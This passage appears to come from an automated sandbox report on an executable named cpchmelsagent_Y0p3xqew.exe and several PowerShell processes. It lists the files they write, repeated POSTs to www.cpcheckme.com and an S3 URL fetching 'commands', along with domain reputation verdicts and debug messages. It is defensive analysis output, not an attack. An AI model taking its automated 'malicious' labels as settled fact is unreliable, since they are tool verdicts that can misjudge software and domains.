MD5:— | SHA256:— | |||
| 3644 | PowerShell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3DVHIVTGDVM7V69FTV6O.temp | — | |
MD5:— | SHA256:— | |||
| 3872 | PowerShell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HX89R2LGT18W06TA7H4V.temp | — | |
MD5:— | SHA256:— | |||
| 3032 | cpcheckme_Y0p3xqew.exe | C:\temp\CP_Agent\cpchmelsagent_Y0p3xqew.exe | executable | |
MD5:— | SHA256:— | |||
| 344 | PowerShell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VN6FP0WK9S6TZ15HYMZP.temp | — | |
MD5:— | SHA256:— | |||
| 3420 | cpchmelsagent_Y0p3xqew.exe | C:\temp\CheckMe.log | text | |
MD5:— | SHA256:— | |||
| 3316 | PowerShell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF155780.TMP | binary | |
MD5:— | SHA256:— | |||
| 3316 | PowerShell.exe | C:\temp\CP\CmScriptLog.log | text | |
MD5:— | SHA256:— | |||
| 3316 | PowerShell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3420 | cpchmelsagent_Y0p3xqew.exe | POST | 200 | 104.27.160.5:80 | http://www.cpcheckme.com/checkme/rest/endpoint/reportTest | US | — | — | malicious |
3420 | cpchmelsagent_Y0p3xqew.exe | POST | 200 | 104.27.160.5:80 | http://www.cpcheckme.com/checkme/rest/endpoint/reportTest | US | — | — | malicious |
3420 | cpchmelsagent_Y0p3xqew.exe | POST | 200 | 104.27.160.5:80 | http://www.cpcheckme.com/checkme/rest/endpoint/reportTest | US | — | — | malicious |
3420 | cpchmelsagent_Y0p3xqew.exe | POST | 200 | 104.27.160.5:80 | http://www.cpcheckme.com/checkme/rest/endpoint/reportTest | US | — | — | malicious |
3420 | cpchmelsagent_Y0p3xqew.exe | POST | 200 | 104.27.160.5:80 | http://www.cpcheckme.com/checkme/rest/endpoint/reportTest | US | — | — | malicious |
2956 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
3644 | PowerShell.exe | GET | 200 | 52.219.88.114:80 | http://s3.us-east-2.amazonaws.com/cpcheckmefiles/files/checkme?commands&Identity=0123456789AB | US | text | 4 b | shared |
3420 | cpchmelsagent_Y0p3xqew.exe | POST | 200 | 104.27.160.5:80 | http://www.cpcheckme.com/checkme/rest/endpoint/reportTest | US | — | — | malicious |
3420 | cpchmelsagent_Y0p3xqew.exe | POST | 200 | 104.27.160.5:80 | http://www.cpcheckme.com/checkme/rest/endpoint/reportTest | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3644 | PowerShell.exe | 52.219.88.114:80 | s3.us-east-2.amazonaws.com | Amazon.com, Inc. | US | shared |
3872 | PowerShell.exe | 52.219.88.162:443 | s3.us-east-2.amazonaws.com | Amazon.com, Inc. | US | shared |
2956 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3420 | cpchmelsagent_Y0p3xqew.exe | 104.27.160.5:80 | www.cpcheckme.com | Cloudflare Inc | US | shared |
4088 | PowerShell.exe | 52.219.96.194:443 | s3.us-east-2.amazonaws.com | — | US | unknown |
3808 | PowerShell.exe | 52.219.104.122:443 | s3.us-east-2.amazonaws.com | — | US | unknown |
3420 | cpchmelsagent_Y0p3xqew.exe | 104.27.161.5:80 | www.cpcheckme.com | Cloudflare Inc | US | shared |
3316 | PowerShell.exe | 52.219.100.82:443 | s3.us-east-2.amazonaws.com | — | US | unknown |
Domain | IP | Reputation |
|---|---|---|
www.cpcheckme.com |
| malicious |
s3.us-east-2.amazonaws.com |
| shared |
www.bing.com |
| whitelisted |
Process | Message |
|---|---|
cpchmelsagent_Y0p3xqew.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
cpchmelsagent_Y0p3xqew.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|